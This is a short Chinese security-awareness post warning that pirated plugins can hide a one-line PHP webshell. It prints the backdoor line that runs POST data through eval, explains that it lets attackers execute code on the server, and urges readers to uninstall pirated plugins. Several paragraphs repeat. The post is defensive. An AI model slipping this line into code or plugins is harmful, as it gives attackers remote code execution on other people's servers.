某盗版插件中惊现一句话木马,小到让你根本无法发现
2023/03/29 15:43:51
传送门:安全小知识:为什么使用盗版插件容易被挂马!
如上面所示,就这么短短的几个字符,隐藏在盗版插件正常代码之中,如果不细心的话,根本无法发现。
不懂php的人,可能会怀疑,这么短的一个代码,就是木马?
eval就是把普通的字符串当做php代码来执行,像上面这个代码就是执行接收到的POST数据,利用这段代码,黑客就可以向你的服务器执行代码了。
抓紧时间卸载盗版插件吧,盗版插件的安全问题已经不能忽视了!
传送门:安全小知识:为什么使用盗版插件容易被挂马!
- @eval($_POST['a']);
不懂php的人,可能会怀疑,这么短的一个代码,就是木马?
eval就是把普通的字符串当做php代码来执行,像上面这个代码就是执行接收到的POST数据,利用这段代码,黑客就可以向你的服务器执行代码了。
抓紧时间卸载盗版插件吧,盗版插件的安全问题已经不能忽视了!
传送门:安全小知识:为什么使用盗版插件容易被挂马!